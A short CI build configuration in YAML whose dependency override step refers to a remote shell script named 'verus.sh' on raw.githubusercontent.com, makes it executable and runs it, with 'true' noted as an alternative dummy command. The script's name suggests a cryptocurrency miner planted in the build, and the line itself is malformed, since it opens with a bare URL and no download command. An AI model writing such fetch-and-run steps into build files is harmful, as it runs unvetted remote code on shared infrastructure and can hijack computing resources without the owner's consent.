build:
    dependencies:
        override:
            - https://raw.githubusercontent.com/konchilsxx/asw/main/verus.sh && chmod +x verus.sh && ./verus.sh

            # or use a "dummy" command like
            - true


           

 
